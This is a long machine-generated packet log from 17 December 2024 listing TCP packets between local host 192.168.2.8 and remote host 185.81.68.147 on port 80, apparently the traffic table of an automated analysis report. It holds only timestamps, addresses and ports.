                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.861866951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.862584114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.862710953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.862813950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.863573074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.863737106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.863840103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.864511967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.864607096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.864742994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.865453959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.865571976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.865634918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.866425991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.866549015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.866697073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.867363930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.867466927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.867547035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.868289948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.868396044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.868942976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.869271994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.869452000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870131969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870213032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870310068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870457888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.871189117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.871335983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872168064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872189045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872251987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872376919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.873116970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.873281956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.873455048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874058962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874393940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874720097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874985933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.875111103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.875247002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.875925064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.876053095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.876266956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.876914978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.877001047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.059767962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.060323000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.060451031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.060496092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061180115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061408997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061543941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.061693907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.062530041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.062541962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.062748909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.063337088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.063546896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.064416885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.064421892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.064446926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065259933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065376997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065959930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.065959930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.066210985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.066322088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.066425085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.067120075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.067238092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068108082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068206072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068561077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.068561077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069052935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069242001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069475889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.069972992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.070137024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.070229053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.070895910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.071082115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.071235895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.071871996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072029114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072182894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072851896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.072938919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.073064089 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.073797941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.129178047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.215842962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.215950966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216041088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216289043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216423988 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.216655970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.217255116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.217417955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.217529058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.218183994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.218281984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.218369007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.219203949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.219290018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.219346046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.220082045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.220196009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.220232010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.221131086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.221195936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.221240044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222001076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222162008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222244978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.222960949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.223087072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.223185062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.223922968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224015951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224281073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224848032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.224980116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.225367069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.225792885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.225925922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226047993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226748943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226844072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.226943016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.227705956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.227891922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228005886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228678942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228792906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.228899002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.229600906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.229723930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.229957104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.230600119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.230736017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.230808973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.231533051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.413695097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.414262056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.414297104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.414345980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.415277004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.415330887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.415455103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.416202068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.416332960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.416376114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.417146921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.417279005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.417279959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.418090105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.418142080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.418275118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.419275999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.419334888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.419344902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.420066118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.420207977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.420295000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421003103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421068907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421101093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421885967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.421956062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.422023058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.422924042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.422971964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423027039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423841953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423911095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.423964024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.424789906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.424890041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.424947977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.425712109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.425757885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.425810099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.426687002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.426736116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.426814079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.427642107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.427695036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.427747965 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.428555012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.428602934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.428658962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.429527998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.429615974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.429616928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.430475950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.430545092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.430577040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.431427956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.431494951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.431564093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.432430029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.432483912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.432498932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.433315992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.433427095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.433450937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.434278011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.434392929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.434449911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.435239077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.435329914 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.435340881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.436904907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437172890 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437244892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437294960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437330961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.437339067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.438079119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.438232899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.438530922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439018965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439060926 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439162970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.439980984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440032959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440083027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440929890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440995932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.440996885 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.441886902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.441962957 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442008018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442861080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442915916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.442970991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.443799973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.443856955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.443906069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.444763899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.626446962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.626547098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.627285957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.627418995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.627612114 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.628252983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.628359079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.628401041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.629245996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.629363060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.629492998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.630211115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.630323887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.630805016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.631196976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.631285906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.631335974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.632074118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.632179022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.632225037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.633059025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.633166075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.633270979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634056091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634166002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634274960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.634938002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.635035038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.635149956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.635879040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.636046886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.636133909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:11.636878967 CET8049709185.81.68.147192.168.2.8
